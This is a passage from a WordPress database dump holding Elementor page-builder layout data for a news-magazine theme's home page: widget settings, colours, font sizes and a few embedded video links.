\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1452,497,'_elementor_version','0.4'),(1453,497,'_elementor_css','a:3:{s:4:\"time\";i:1508921517;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1455,498,'_elementor_edit_mode','builder'),(1456,498,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_